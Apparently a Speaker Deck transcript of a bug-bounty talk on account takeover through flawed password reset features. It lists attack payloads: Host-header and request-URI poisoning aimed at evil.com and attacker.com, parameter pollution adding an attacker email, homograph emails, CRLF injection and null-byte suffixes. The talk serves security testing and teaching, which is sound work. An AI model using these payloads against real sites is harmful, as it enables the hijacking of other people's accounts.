Upgrade to Pro — share decks privately, control downloads, hide ads and more …

Account Takeover via Exploiting Misconfigured P...

Tuhin Bose
November 06, 2021
Technology
2
2.1k

Account Takeover via Exploiting Misconfigured Password Reset Feature

Implementing a password reset function is a very challenging part for every developers. There is no well-defined standard on how to implement a secure password reset functionality in an application. That's why every application has a different way of implementation like sending unique URLs, generating a temporary password, security questions, OTP etc.

Every developer has a different approach of implementing such feature. That's why every time the hacker has to think of a new way to hack. In this talk, I'll be briefly telling some methodologies for achieving Account Takeover via exploiting misconfigured password reset functionality.

Tuhin Bose

November 06, 2021
Tweet

More Decks by Tuhin Bose

See All by Tuhin Bose
Wordpress Security
tuhin1729
1
1.4k
Abusing Password Reset Functionality
tuhin1729
0
710
Dependency Confusion
tuhin1729
0
710
2 Factor Authentication Bypass
tuhin1729
1
1.1k

Other Decks in Technology

See All in Technology
ISUCONに強くなるかもしれない日々の過ごしかた/Findy ISUCON 2024-11-14
fujiwara3
8
870
SREが投資するAIOps ~ペアーズにおけるLLM for Developerへの取り組み~
takumiogawa
1
180
Shopifyアプリ開発における Shopifyの機能活用
sonatard
4
250
iOS/Androidで同じUI体験をネ イティブで作成する際に気をつ けたい落とし穴
fumiyasac0921
1
110
TypeScript、上達の瞬間
sadnessojisan
46
13k
Adopting Jetpack Compose in Your Existing Project - GDG DevFest Bangkok 2024
akexorcist
0
110
スクラムチームを立ち上げる〜チーム開発で得られたもの・得られなかったもの〜
ohnoeight
2
350
テストコード品質を高めるためにMutation Testingライブラリ・Strykerを実戦導入してみた話
ysknsid25
7
2.6k
CysharpのOSS群から見るModern C#の現在地
neuecc
2
3.2k
Introduction to Works of ML Engineer in LY Corporation
lycorp_recruit_jp
0
110
OCI Vault 概要
oracle4engineer
PRO
0
9.7k
ExaDB-D dbaascli で出来ること
oracle4engineer
PRO
0
3.8k

Featured

See All Featured
VelocityConf: Rendering Performance Case Studies
addyosmani
325
24k
Refactoring Trust on Your Teams (GOTO; Chicago 2020)
rmw
31
2.7k
What's new in Ruby 2.0
geeforr
343
31k
XXLCSS - How to scale CSS and keep your sanity
sugarenia
246
1.3M
jQuery: Nuts, Bolts and Bling
dougneiner
61
7.5k
[RailsConf 2023 Opening Keynote] The Magic of Rails
eileencodes
28
9.1k
What's in a price? How to price your products and services
michaelherold
243
12k
Rails Girls Zürich Keynote
gr2m
94
13k
Making Projects Easy
brettharned
115
5.9k
I Don’t Have Time: Getting Over the Fear to Launch Your Podcast
jcasabona
28
2k
Rebuilding a faster, lazier Slack
samanthasiow
79
8.7k
ReactJS: Keep Simple. Everything can be a component!
pedronauck
665
120k

Transcript

  1. Account Takeover via Exploiting Misconfigured Password Reset Feature By Tuhin

    Bose

  2. Who am I?

  3. Conclusion & QNA Conclusion & QNA What is Password What

    is Password Reset Feature? Reset Feature? Password Reset Password Reset Implementation Implementation Techniques Used by Techniques Used by Developers Developers ATO via Hacking ATO via Hacking Misconfigured Misconfigured Password Reset Feature Password Reset Feature AGENDA

  4. What is Password Reset Feature?

  5. Reset password is the action of invalidating the current password

    for an account on an application and then setting a new one. Most of the services have a password reset feature ("Forgot Password" service) which allows you to reset your password.

  6. Password Reset Implementation Techniques Used by Developers

  7. Password Reset Implementation Techniques Used by Developers

  8. ATO via Hacking Misconfigured Password Reset Feature

  9. Host Header Injection - Password Reset Host Header Injection -

    Password Reset Poisoning Poisoning 1 1. . Host: evil.com or X-Forwarded-Host: evil.com

  10. Password Reset Poisoning Password Reset Poisoning 1 1. .

  11. 2. Modifying Request-URI 2. Modifying Request-URI POST https://attacker.com/forgot-password HTTP/1.1 POST

    @attacker.com/forgot-password HTTP/1.1 POST :@attacker.com/forgot-password HTTP/1.1 POST /[email protected] HTTP/1.1

  12. 2. Modifying Request-URI 2. Modifying Request-URI

  13. 2. Modifying Request-URI 2. Modifying Request-URI

  14. 3. Token leakage 3. Token leakage

  15. 3. Token leakage 3. Token leakage https://www.company.com/#/changePassword/ username/token

  16. 4. HTTP Parameter Pollution (HPP) 4. HTTP Parameter Pollution (HPP)

    [email protected]&[email protected] email[][email protected]&email[][email protected] [email protected]%[email protected] [email protected]|[email protected] [email protected],[email protected] [email protected]%[email protected] {"email":"[email protected]","email":"[email protected]"} {"email":["[email protected]","[email protected]"]}

  17. 4. HTTP Parameter Pollution (HPP) 4. HTTP Parameter Pollution (HPP)

  18. 4. HTTP Parameter Pollution (HPP) 4. HTTP Parameter Pollution (HPP)

  19. 5. Insecure Direct Object Reference (IDOR) 5. Insecure Direct Object

    Reference (IDOR) Use Param Miner to get extra parameters (or append previously known parameters) in the request. Now try IDOR.

  20. 5. Insecure Direct Object Reference 5. Insecure Direct Object Reference

  21. 6. Try homograph on password reset. 6. Try homograph on

    password reset. [email protected] email=victim@gmаil.com [email protected] Using Unicode: Cyrillic Small Letter A

  22. 6. Try homograph on password reset. 6. Try homograph on

    password reset. https://github.com/UndeadSec/EvilURL

  23. 6. Try homograph on password reset. 6. Try homograph on

    password reset. Steps to reproduce: 1. Create a new account with [email protected] 2. Go to password reset page and enter this email: tuhin1729@gmаil.com.xyz.burpcollaborator.net [Here "a" is different] If it's vulnerable then you'll get the password reset link to your collaborator server.

  24. 7. If they are sending an otp for password reset,

    7. If they are sending an otp for password reset, try 2fa bypass techniques. try 2fa bypass techniques. https://tinyurl.com/tuhin1729-2fa

  25. 8. 8. Append a .json after the endpoint. Append a

    .json after the endpoint.

  26. 9. Weak Encryption 9. Weak Encryption While generating password reset

    tokens, sometimes developers use weak encryption algorithms. For example, sometimes they just encrypt the user-id/username of user + timestrap using some weak encryption algorithms .

  27. POST /resetpassword?%0d%0aHost:%20attacker.com HTTP/1.1 10. 10. CRLF Injection CRLF Injection

  28. 10. 10. CRLF Injection CRLF Injection

  29. 11. Change the request method and content-type and observe how

    the application is responding. Original Modified

  30. 12. Append null bytes after your email and observe the

    response. {"email":"[email protected]"} {"email":"[email protected]%00"} %00, %0d%0a, %0d, %0a, %09, %0C, %20

  31. More: More: https://tinyurl.com/tuhin1729-passwordreset

  32. Twitter: @tuhin1729_ | Medium: @tuhin1729 | Instagram: @tuhin1729 Thank You!

    Thank You! Thank You!